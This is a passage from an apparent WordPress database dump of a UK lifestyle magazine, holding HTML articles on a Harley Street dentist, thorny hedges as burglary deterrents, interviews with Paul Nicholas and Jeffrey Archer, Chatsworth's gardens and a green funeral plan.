st_url=\"http://westonspirit.org.uk/2012/04/have-something-to-smile-about/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Benefit from the expertise and experience of a Harley Street dental practice to get the smile you want</h4>&#13;\n<p>Harley Street Smile is a long-established dental practice in the heart of Harley Street.</p>&#13;\n<p>Although the practice already enjoyed an excellent reputation before Dr Filippos Mavroskoufis took over in 1988, he gradually instilled his own philosophy and methodology, with great results. After his postgraduate education and teaching prosthodontics (speciality of restoring or replacing teeth), he transformed the practice into a centre where the highest standards of aesthetics, functionality, comfort and durability are carried out in a warm and relaxing environment. And when the support of other dental specialties is needed, such as periodontics and implantology, Harley Street Smile can call upon a network of some of the most experienced specialists in London, readily available to work collaboratively towards achieving the best result for the patient.</p>&#13;\n<p></p><div id=\"attachment_1797\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1797\" title=\"Dr Mavroskoufis has instilled his practices since 1988\" src=\"/wp-content/uploads/2012/03/DSC_0388-b.jpg\" alt=\"\" width=\"596\" height=\"399\" /><p class=\"wp-caption-text\">Dr Mavroskoufis has instilled his practices since 1988</p></div>&#13;\n<p>We have many patients, the majority of whom have been with the practice for 20 to 30 years, often referring their families and friends. The popularity of the practice has grown through word of mouth and the ambience among staff and our loyal patient base is unique. Our experienced and charming in-house hygienist is also a valuable asset. We always welcome new patients, so why not come in for a consultation and benefit from years of experience?</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>For a consultation, please call Sonya</em><strong><em> 0207 580 5828</em></strong></p>&#13;\n<p><strong><em><a title=\"www.harleystreetsmile.co.uk\" href=\"http://www.harleystreetsmile.co.uk/\" target=\"_blank\">www.harleystreetsmile.co.uk</a></em></strong></p>&#13;\n									</div>','Have something to smile about','224','publish','open','open','','have-something-to-smile-about','','','2018-04-02 20:06:54','2018-04-02 20:06:54','',0,'http://westonspirit.org.uk/have-something-to-smile-about.asp',0,'post','',0),(148,1,'2014-10-10 00:25:22','2014-10-10 00:25:22','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> croberts\" title=\"Posts by Steve Martin\" rel=\"author\"&gt;Steve Martin</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"How can you nip intruders in the bud?\" st_url=\"http://westonspirit.org.uk/2012/04/how-can-you-nip-intruders-in-the-bud/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"How can you nip intruders in the bud?\" st_url=\"http://westonspirit.org.uk/2012/04/how-can-you-nip-intruders-in-the-bud/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"How can you nip intruders in the bud?\" st_url=\"http://westonspirit.org.uk/2012/04/how-can-you-nip-intruders-in-the-bud/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"How can you nip intruders in the bud?\" st_url=\"http://westonspirit.org.uk/2012/04/how-can-you-nip-intruders-in-the-bud/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"How can you nip intruders in the bud?\" st_url=\"http://westonspirit.org.uk/2012/04/how-can-you-nip-intruders-in-the-bud/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Gardens aren’t just for leisure – plan your planting carefully and you could boost your property’s security at the same time, says Steve Martin</h4>&#13;\n<p>Daniela McBride’s back garden slopes down to a wild section adjoining a quiet road. The boundary wall is much lower on the road side and when local schoolchildren spotted a trampoline at the bottom of the garden, they just couldn’t resist hopping over for a bounce.</p>&#13;\n<p>“They weren’t really doing any harm,” says Londoner McBride, 60, “but then older children started coming in and they broke a fence and were quite abusive.”</p>&#13;\n<div id=\"attachment_1757\" style=\"width: 310px\" class=\"wp-caption alignright\"><img class=\"size-medium wp-image-1757\" title=\"Chris Beardshaw\" src=\"/wp-content/uploads/2012/03/Chris-Beardshaw2-300x450.jpg\" alt=\"\" width=\"300\" height=\"450\" srcset=\"../../../wp-content/uploads/2012/03/Chris-Beardshaw2-300x450.jpg 300w\" sizes=\"(max-width: 300px) 100vw, 300px\" /><p class=\"wp-caption-text\">Chris Beardshaw</p></div>&#13;\n<p>Reluctant to build an ugly, high wall, she opted for a thorny hedge instead. That was four years ago and she has had no problems with intruders since.</p>&#13;\n<p>A bit of judicious planting can deter more than just mischievous children. With crime statistics showing burglaries are on the increase, police are keen to encourage defensive gardening.</p>&#13;\n<p>It’s often an opportunistic crime, says Paul Francis, a crime reduction officer in Gloucestershire, where the police have run several defensive gardening initiatives. “Burglars don’t like thorny hedges as they might leave shreds of clothing from which we can identify them or prick themselves and leave blood from which we might get DNA.”</p>&#13;\n<p>McBride’s garden designer, Philippa O’Brien, chose the Pyracantha, or Firethorn, that’s now flourishing.</p>&#13;\n<p>“Not only does it have the most unpleasant thorns,” explains O’Brien, “but it will grow well where many other plants won’t, particularly in dry shade. It’s also fast growing and you can buy 6ft plants for £20 to £30, so it’s a good way to put in an instant thorny hedge.”</p>&#13;\n<p>For spacious country gardens or a wilder look, TV gardener Chris Beardshaw suggests a mixed thorn hedge. “They work really well to form a dense barrier that has benefits to wildlife in terms of food and habitat but minimises animal intrusion and helps with security. A mix of species makes it attractive and productive.</p><div class=\"woo-sc-quote\"><p>A bit of judicious planting can deter more than just mischievous children. With burglaries on the increase, police are keen to encourage defensive gardening</p></div>&#13;\n<p>“The ones I typically include are Blackthorn (Prunus spinosa) for the sloe berries, Hawthorn (Crataegus monogyna), and Sea Buckthorn (Hippophae rhamnoides) which has bright orange berries and is particularly thorny. I like to add in something like Dog Rose (Rosa Canina), too, for its fabulous single flowers and delicious scent.”</p>&#13;\n<p>Paul Francis also advises putting in prickly plants to protect other vulnerable areas, such as where someone could climb onto a flat roof and gain access to an upstairs window. A flimsy trellis fixed to the top of walls and fences is another good anti-climb device, especially with thorny climbers, which can also be trained up drainpipes.</p>&#13;\n<p>Finally, front garden hedges should be no more than around 3ft high and shrubs should be kept pruned so they don’t provide cover for intruders.</p>&#13;\n<p>Daniela McBride is very happy with her hedge. “It fits with the wild part of the garden, has flowers in summer and berries in the autumn, and it hides the wall,” she says.</p>&#13;\n<p>The only downside of defensive plants is they bite back when you try to prune them, so a long-handled hedge-trimmer is a must.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>For more tips, visit: <strong><a title=\"www.met.police.uk/crimeprevention/garden.htm#natural\" href=\"http://www.met.police.uk/crimeprevention/garden.htm#natural\" target=\"_blank\">www.met.police.uk/crimeprevention/garden.htm#natural</a></strong></em></p>&#13;\n									</div>','How can you nip intruders in the bud?','540','publish','open','open','','how-can-you-nip-intruders-in-the-bud','','','2018-04-02 20:06:53','2018-04-02 20:06:53','',0,'http://westonspirit.org.uk/how-can-you-nip-intruders-in-the-bud.asp',0,'post','',0),(149,1,'2017-01-18 20:40:02','2017-01-18 20:40:02','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"I couldn’t live without… A portrait of my father\" st_url=\"http://westonspirit.org.uk/2012/04/i-couldnt-live-without-a-portrait-of-my-father/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"I couldn’t live without… A portrait of my father\" st_url=\"http://westonspirit.org.uk/2012/04/i-couldnt-live-without-a-portrait-of-my-father/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"I couldn’t live without… A portrait of my father\" st_url=\"http://westonspirit.org.uk/2012/04/i-couldnt-live-without-a-portrait-of-my-father/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"I couldn’t live without… A portrait of my father\" st_url=\"http://westonspirit.org.uk/2012/04/i-couldnt-live-without-a-portrait-of-my-father/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"I couldn’t live without… A portrait of my father\" st_url=\"http://westonspirit.org.uk/2012/04/i-couldnt-live-without-a-portrait-of-my-father/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Paul Nicholas on his father’s influence</h4>&#13;\n<h3>Who was your dad?</h3>&#13;\n<p>His name was Oscar Beuselinck and he was unlike most other lawyers of his generation. He grew up in the 1940s when solicitors were upper class and bowler-hatted; he was an office boy at 14 and ended up running the firm, becoming a flamboyant libel and showbiz attorney, representing everyone from Sean Connery and Richard Harris to The Beatles. I think they all liked him because they could relate to him. He was a colourful guy and while I loved and respected him, he could be irritating with a terrible habit of testing people to see how far he could push them. He’d come round your house, for example, open your mail and read it. He could really piss you off.</p>&#13;\n<div id=\"attachment_1839\" style=\"width: 368px\" class=\"wp-caption alignright\"><img class=\" wp-image-1839 \" title=\"What I Can\'t Live Without\" src=\"/wp-content/uploads/2012/04/What-I-Cant-Live-Without.jpg\" alt=\"\" width=\"358\" height=\"476\" srcset=\"../../../wp-content/uploads/2012/04/What-I-Cant-Live-Without.jpg 596w\" sizes=\"(max-width: 358px) 100vw358px\" /><p class=\"wp-caption-text\">Portrait of my dad, Oscar Beuselinck</p></div>&#13;\n<p> </p>&#13;\n<h3>Did he provide you with an introduction to showbiz?</h3>&#13;\n<p>Occasionally he’d take me to shows when I was growing up in the 1950s – I remember seeing the Crazy Gang at the Victoria Palace – and sometimes famous people would come to the house, like the writer John Osborne. Dad wasn’t really a family man; he used to think relatives were boring. When I got my first high-profile showbiz job at 23 in the musical Hair, he encouraged me to take a stage name. I think he was looking after his own reputation, to some extent. While the sex, nudity and drugs didn’t worry him at all, he was concerned I wasn’t going to make anything of it. So I changed my name to Nicholas (from Paul Oscar Beuselinck) which I’ve regretted ever since. I prefer my own name.</p>&#13;\n<h3>How did the portrait come about?</h3>&#13;\n<p>His firm had it done for his 70th birthday in 1983. It’s now in my dining room so he looks down at all of us at Christmas with a wry smile on his face.</p>&#13;\n<h3>Are your stints as pop star, musical theatre performer and actor three different careers or a continuation of the same calling?</h3>&#13;\n<p>I just like to be involved with things that work whether it’s a pop song or a TV show. The pop career in the 1970s, for example, was all about having a hit record and not about being a famous pop singer.</p>&#13;\n<h3>Did you have a wild 1970s?</h3>&#13;\n<p>You never knew what was around the corner. I once received a phone call out of nowhere asking me to go and meet Pete Townshend and Ken Russell who were filming the Who’s Tommy. They played me the song and suddenly I found myself singing it in the movie while being thoroughly objectionable and dragging Roger Daltrey around the set by his hair. I remember Keith Moon and Oliver Reed spending most of their time organising drinking contests which were quite fun. I did try the rock singer lifestyle a bit, but every time I had a drink I used to spend four hours throwing up. You needed a cast-iron constitution back then and I’ve always had a sensitive stomach.</p>&#13;\n<h3>Do people still think of you as Vince from Just Good Friends?</h3>&#13;\n<p>The character of Vince just seemed to fit me and I could really relate to him. I had been previously married and had a motherin- law not too dissimilar to Daphne in the show.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><img class=\" wp-image-1840   alignleft\" title=\"Paul Nicholas\" src=\"/wp-content/uploads/2012/04/PN276a-Final-300x291.jpg\" alt=\"\" width=\"144\" height=\"140\" srcset=\"../../../wp-content/uploads/2012/04/PN276a-Final-300x291.jpg 300w\" sizes=\"(max-width: 144px) 100vw144px\" /></p>&#13;\n<p> </p>&#13;\n<p> <strong>Paul Nicholas</strong> directs a new musical version of Dickens’ A Tale of Two Cities at the Charing Cross Theatre in London until 12 May.</p>&#13;\n<p><em>Interview by John Holt</em></p>&#13;\n									</div>','I couldn’t live without… A portrait of my father','580','publish','open','open','','i-couldnt-live-without-a-portrait-of-my-father','','','2018-04-02 20:06:51','2018-04-02 20:06:51','',0,'http://westonspirit.org.uk/i-couldnt-live-without-a-portrait-of-my-father.asp',0,'post','',0),(150,1,'2014-06-18 10:58:26','2014-06-18 10:58:26','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"I couldn’t live without… My egg timer\" st_url=\"http://westonspirit.org.uk/2012/04/i-couldnt-live-without-my-egg-timer/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"I couldn’t live without… My egg timer\" st_url=\"http://westonspirit.org.uk/2012/04/i-couldnt-live-without-my-egg-timer/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"I couldn’t live without… My egg timer\" st_url=\"http://westonspirit.org.uk/2012/04/i-couldnt-live-without-my-egg-timer/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"I couldn’t live without… My egg timer\" st_url=\"http://westonspirit.org.uk/2012/04/i-couldnt-live-without-my-egg-timer/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"I couldn’t live without… My egg timer\" st_url=\"http://westonspirit.org.uk/2012/04/i-couldnt-live-without-my-egg-timer/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Jeffrey Archer treasures his writing time</h4>&#13;\n<p></p><div id=\"attachment_1731\" class=\"wp-caption alignright\" style=\"width: 296px\"><img class=\" wp-image-1731  \" title=\"A taskmaster and a blighter\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/HI-RES-EGG-TIMER-2.jpg\" alt=\"\" width=\"286\" height=\"397\" /><p class=\"wp-caption-text\">A taskmaster and a blighter</p></div><br /><h3>Why an egg timer?</h3>&#13;\n<p>It’s a beautiful object, silver and glass. My wife had it made for my birthday by Garrard the jeweller to help with my writing schedule as the sand runs out in exactly one hour. I work four two-hour sessions each day over an initial 50-day writing period and the timer doesn’t allow you to cheat. When you look at a watch, you can easily knock a few minutes off here and there which really mounts up. The timer is a taskmaster and a blighter but I love it.</p>&#13;\n<h3>Do you know exactly what to write when you start a book?</h3>&#13;\n<p>I might have a vague idea of the opening three or four chapters. A writer knows exactly where he’s going, whereas a storyteller shouldn’t be so sure because if he knows, then the reader will know, too. He almost can’t help himself and he’ll give it away. If I don’t know the ending myself, I can’t give it away.</p>&#13;\n<h3>Do you still hand write everything?</h3>&#13;\n<p>Every word and I get through one pen each day. My PA then types up the manuscript, triple-spaced to allow pencil and rubber corrections. I dislike technology . . . I think I’m frightened of it, frightened that I won’t do my best. I like the feel of pen across paper. I like the pace which allows you to think ahead. I have an e-book reader and my family are amazed I can actually work it. There’s considerably less pleasure than reading from a page, of course, but when you’re stuck on a Spanish cliff-top in the middle of nowhere – which is where I write – it’s pretty convenient.</p>&#13;\n<p></p><div id=\"attachment_1732\" class=\"wp-caption alignleft\" style=\"width: 261px\"><img class=\" wp-image-1732  \" title=\"Jeffrey Archer \" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Swannell-casual-colour.jpg\" alt=\"\" width=\"251\" height=\"332\" /><p class=\"wp-caption-text\">Jeffrey Archer</p></div>&#13;\n<p> </p>&#13;\n<h3>Who are you writing for these days?</h3>&#13;\n<p>When young writers ask me for advice, I tell them not to suddenly start writing ghost stories or tales about vampires just because they’re fashionable. Do what you do, what you know and feel. Jane Austen lived in a small village, writing about her family and produced six of the most-loved, beautifully written books in history. I write my stories hoping that my current readers will continue to enjoy them and that new ones may come aboard. Obviously, people do come in and out of fashion; take old Terrence Rattigan, for example. When I was a child, he was the most-adored playwright. Then he went through an age when people simply didn’t want to know. The next thing, he had three plays running in London at the same time. But you mustn’t think to yourself “Demons are in this year, I’ll write about demons.” Just tell your stories.</p>&#13;\n<h3>You have two more writing sessions left today. Do you really not know what’s going to happen?</h3>&#13;\n<p>Actually, the next session is relatively clear because of what I wrote just before you rang. I’m working on the third volume of the Clifton Chronicles and I now know that, by the time my sand has run out twice today, I need to arrive at a vote of no-confidence in a Labour Party constituency meeting in Bristol.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>Jeffrey Archer’s</strong> The Sins Of The Father, volume 2 of the Clifton Chronicles, is published by Macmillan, £18.99</em></p>&#13;\n									</div>','I couldn’t live without... My egg timer','546','publish','open','open','','i-couldnt-live-without-my-egg-timer','','','2018-04-02 20:06:50','2018-04-02 20:06:50','',0,'http://westonspirit.org.uk/i-couldnt-live-without-my-egg-timer.asp',0,'post','',0),(151,1,'2015-05-11 19:33:03','2015-05-11 19:33:03','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> lwhitney\" title=\"Posts by Linda Whitney\" rel=\"author\"&gt;Linda Whitney</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"“I’m a very lucky man”\" st_url=\"http://westonspirit.org.uk/2012/04/im-a-very-lucky-man/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"“I’m a very lucky man”\" st_url=\"http://westonspirit.org.uk/2012/04/im-a-very-lucky-man/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"“I’m a very lucky man”\" st_url=\"http://westonspirit.org.uk/2012/04/im-a-very-lucky-man/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"“I’m a very lucky man”\" st_url=\"http://westonspirit.org.uk/2012/04/im-a-very-lucky-man/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"“I’m a very lucky man”\" st_url=\"http://westonspirit.org.uk/2012/04/im-a-very-lucky-man/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>If taking care of your outdoor space sometimes seems like hard work, think of Chatsworth and the challenges and rewards of looking after a really, really big garden…</h4>&#13;\n<p>For most people returning from holiday is a letdown, but the reverse is true for gardener Alan Froggatt. But then he does live and work on one of the country’s most spectacular estates – Chatsworth in Derbyshire.</p>&#13;\n<p>“Nowhere compares to the fabulous beauty of the garden here,” he enthuses. “I still marvel at the inventiveness of its creators. I know I’m a very lucky man.”</p>&#13;\n<p></p><div id=\"attachment_1748\" class=\"wp-caption alignright\" style=\"width: 359px\"><img class=\" wp-image-1748  \" title=\"Alan Froggatt\" src=\"/wp-content/uploads/2012/03/Gardener-1-copy-e1333121222977.jpg\" alt=\"\" width=\"349\" height=\"373\" /><p class=\"wp-caption-text\">Alan Froggatt</p></div>&#13;\n<p>Many of the half a million yearly visitors will see only part of the glory Froggatt talks about, given the garden is spread across 105 acres. But whether they take in its sweeping parkland views, avenues of trees and art and water features, or browse the glasshouses or pockets of interest, few are disappointed.</p>&#13;\n<p>The garden has been shaped by the tastes of its owners, the Devonshires, as well as fashions of the day. The 17th-century first garden was a vast, symmetrical affair modelled on Hampton Court’s. Almost all of it, although not the Cascade, was later razed to make way for a more natural, romantic look created by Lancelot “Capability” Brown.</p>&#13;\n<p>However, the greatest influence comes from the sixth duke, who appointed Joseph Paxton head gardener in 1826. Paxton assembled the gritstone rock garden using a steam-powered machine he invented himself. He also added the Strid – an imitation of a narrow part of the river at the Devonshires’ Bolton Abbey estate in the Yorkshire Dales.</p>&#13;\n<p>During this time, hundreds of species of plants and trees from all over the world were brought to Chatsworth. Among them were its tropical horticultural jewels, the Dwarf Cavendish banana and the Victoria amazonica water lily.</p><div class=\"woo-sc-quote\"><p>The aim is to make Chatsworth’s garden welcoming and encourage exploration – there are no “keep off the grass” signs and dogs on leads are allowed</p></div>&#13;\n<p>Remnants of Paxton’s Great Conservatory – a precursor to his Crystal Palace – form the foundation of a maze built of 1,200 yew plants in 1962. Rose, cottage and sensory gardens, and a three-acre kitchen garden, which supplies vegetables, salad, flowers and fruit to the house, are just a few of the other places of interest.</p>&#13;\n<p><img class=\"alignleft  wp-image-1749\" style=\"border-style: initial; border-color: initial;\" title=\"Kitchen Garden Tulips\" src=\"/wp-content/uploads/2012/03/Kitchen-Garden-Tulips.jpg\" alt=\"\" width=\"286\" height=\"382\" /></p>&#13;\n<p>The garden is cared for by 17 gardeners, as well as volunteers. The aim is to make it welcoming and encourage exploration – there are no “keep off the grass” signs and dogs on leads are allowed.</p>&#13;\n<p>The team works closely with the 12th duke, Peregrine, and his wife Amanda to preserve its history, but also develop new features. “The greatest gardens evolve all the time. I don’t think you can stand still,” says Froggatt, who has been at Chatsworth for 12 years and a gardener for 40.</p>&#13;\n<p>He is overseeing the upgrade of a ravine feature on a rugged far side of the garden to create mirror-like ponds which he hopes will become a focal point. Other changes this year include cultivating bigger and more diverse displays of tulips (a total of 24,000 blooms) and, later, dahlias.</p>&#13;\n<p>Coping with changeable elements is always a challenge for Chatsworth’s gardeners. The water features are gravity-fed with water from man-made lakes, and the system also powers turbines which have supplied electricity to the house since 1893. Ongoing dry conditions affected supplies last summer, so work is being done to improve flow by opening up streams draining into the lakes.</p>&#13;\n<p><img class=\"alignright  wp-image-1747\" title=\"Emperor fountain going to 200ft\" src=\"/wp-content/uploads/2012/03/Emperor-fountain-going-to-200ft.jpg\" alt=\"\" width=\"286\" height=\"381\" />Perhaps surprisingly, Chatsworth’s challenges are not dissimilar from those of the average householder, according to head gardener Steve Porter. As such, weeding and mulching to suppress weeds and feed plants are on the list for April, as is further sowing to ensure a good spread of flowers and fruits across the months ahead. The Chatsworth team will also be checking that their many shrubs and trees are stable and well-rooted.</p>&#13;\n<p>“We face the same issues as every other garden but on a larger scale,” Porter says. “We’re doing various things to conserve water, like adapting what we plant and when we plant it.”</p>&#13;\n<p>The emphasis is on sustainability. The estate continues to produce its own potting compost and a biomass system is being installed to heat the glasshouses with wood from the park.</p>&#13;\n<p>“Estates like Chatsworth have always been very self-sufficient,” Porter adds. “We might have modern machinery but we try to maintain traditional systems as much as we can.”</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>An exhibition of sculptures by <strong>Sir Anthony Caro</strong> is on show in <strong>Chatsworth’s garden</strong> until July. Events are planned to celebrate the <strong>Queen’s Diamond Jubilee</strong>.</em></p>&#13;\n<p><em><strong>Visit <a href=\"http://www.chatsworth.org/\" target=\"_blank\">www.chatsworth.org</a></strong></em></p>&#13;\n									</div>','“I’m a very lucky man”','759','publish','open','open','','im-a-very-lucky-man','','','2018-04-02 20:06:48','2018-04-02 20:06:48','',0,'http://westonspirit.org.uk/im-a-very-lucky-man.asp',0,'post','',0),(152,1,'2017-04-04 21:43:57','2017-04-04 21:43:57','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Just call me Beatrix Potter\" st_url=\"http://westonspirit.org.uk/2012/04/just-call-me-beatrix-potter/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Just call me Beatrix Potter\" st_url=\"http://westonspirit.org.uk/2012/04/just-call-me-beatrix-potter/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Just call me Beatrix Potter\" st_url=\"http://westonspirit.org.uk/2012/04/just-call-me-beatrix-potter/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Just call me Beatrix Potter\" st_url=\"http://westonspirit.org.uk/2012/04/just-call-me-beatrix-potter/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Just call me Beatrix Potter\" st_url=\"http://westonspirit.org.uk/2012/04/just-call-me-beatrix-potter/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>It’s time to come out of hibernation, shrug off the sweaters and enjoy what spring will bring – wildlife, greenery and plenty to do</h4>&#13;\n<p>Spring is here and not before time. If you’re anything like me and detest January and February, the arrival of warmer days and lighter nights is a blessed relief to the soul and to the senses. And after months when there is nothing green to see in the garden but a pile of yet-to-be-composted grass cuttings, the sudden glimpse of tiny leaves sprouting from a hawthorn tree is more uplifting to the spirits than a burst of the Hallelujah Chorus.</p>&#13;\n<p><img class=\"alignright  wp-image-1718\" title=\"GUAG \" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/GUAG-squirrel-e1333118192817.jpg\" alt=\"\" width=\"333\" height=\"309\" />The wildlife has also got suddenly busy. Enormously fat wood pigeons are defying gravity and nest-building on the slenderest of branches. The hedgehog has been spotted doing his round-shouldered waddle across our lawn on slug watch. And call me Beatrix Potter but there can be no more cheering picture first thing in the morning than an upside-down squirrel raiding a bird-feeder, his cheeks bulging with plundered peanuts.</p>&#13;\n<p>Spring brings joy to suburban plots like ours but for those whose job it is to maintain gardens open to the public, it brings a set of larger scale, though not entirely dissimilar tasks. For our gardening special this month, we visited Chatsworth, the Derbyshire ancestral home of the Duke and Duchess of Devonshire, to see how they are preparing for the year ahead. We suggest a few ideas for brightening up your borders, lawns and patios in the shape of new furniture and ornaments.</p>&#13;\n<p>And for those who prefer to be out and about on fine days, rather than squirrel-watching, we’ve selected some ideas for what to see and do, including some events now held to celebrate St George’s Day. </p>&#13;\n									</div>','Just call me Beatrix Potter','292','publish','open','open','','just-call-me-beatrix-potter','','','2018-04-02 20:06:46','2018-04-02 20:06:46','',0,'http://westonspirit.org.uk/just-call-me-beatrix-potter.asp',0,'post','',0),(153,1,'2017-04-28 21:00:01','2017-04-28 21:00:01','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Kind to your family, kind to the environment\" st_url=\"http://westonspirit.org.uk/2012/04/kind-to-your-family-kind-to-the-environment/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Kind to your family, kind to the environment\" st_url=\"http://westonspirit.org.uk/2012/04/kind-to-your-family-kind-to-the-environment/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Kind to your family, kind to the environment\" st_url=\"http://westonspirit.org.uk/2012/04/kind-to-your-family-kind-to-the-environment/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Kind to your family, kind to the environment\" st_url=\"http://westonspirit.org.uk/2012/04/kind-to-your-family-kind-to-the-environment/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Kind to your family, kind to the environment\" st_url=\"http://westonspirit.org.uk/2012/04/kind-to-your-family-kind-to-the-environment/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>The UK’s first green funeral plan eases the financial burden left to your loved ones while keeping in line with your environmental ethics</h4>&#13;\n<p>In response to growing demand for environmentally conscious funerals, Golden Leaves Funeral Plans has launched the ultimate green funeral plan so you can make end-of-life choices in line with your environmental ethics.</p>&#13;\n<p>Golden Leaves is the first UK-wide provider of such a service, and removes the financial burden of funeral costs from loved ones – prices start from just £1,934.</p>&#13;\n<p>As well as a biodegradable coffin, made from sustainable wood, willow, bamboo or wool, the plan ensures that the entire carbon footprint of a funeral service’s emissions is rebalanced. This is achieved by planting trees in a conservation area or by donating funds to help preserve endangered rainforests around the world.</p>&#13;\n<p></p><div id=\"attachment_1762\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1762\" title=\"Golden Leaves\" src=\"/wp-content/uploads/2012/03/Golden-Leaves.jpg\" alt=\"\" width=\"596\" height=\"397\" /><p class=\"wp-caption-text\">Barry Floyd, operation director of Golden Leaves, with Mark Morris of JC Atkinson</p></div>&#13;\n<p>Golden Leaves also makes a donation to a community legacy fund. This fund is managed by the Groundwork charity, which works at a local and national level to combat climate change. Legacy donations will initially aid funding to install energy efficient measures in the homes of the UK’s elderly and most vulnerable.</p>&#13;\n<p>“Green” funerals have traditionally only allowed burials due to the carbon emissions associated with cremation. However, as the ultimate green funeral plan offsets those emissions, there is an option available to be cremated in a biodegradable coffin, with ashes placed in a biodegradable urn and buried in a cemetery or woodland burial ground.</p>&#13;\n<p>The secure financial structure of the plan also reflects best environmental practice. Money is invested into the independently audited Green Trust Fund, which only places funds in green and ethical investments.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><strong><em>0800 854 448</em></strong></p>&#13;\n<p><strong><em><a title=\"www.thegreenfuneralplan.com\" href=\"http://www.thegreenfuneralplan.com/\" target=\"_blank\">www.thegreenfuneralplan.com</a></em></strong></p>&#13;\n									</div>','Kind to your family, kind to the environment','289','publish','open','open','','kind-to-your-family-kind-to-the-environment','','','2018-04-02 20:06:45','2018-04-02 20:06:45','',0,'http://westonspirit.org.uk/kind-to-your-family-kind-to-the-environment.asp',0,'post','',0),(155,1,'2015-05-10 04:43:34','2015-05-10 04:43:34','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 April 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Managing arthritis the natural way\" st_url=\"http://westonspirit.org.uk/2012/04/managing-arthritis-the-natural-way/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Managing arthritis the natural way\" 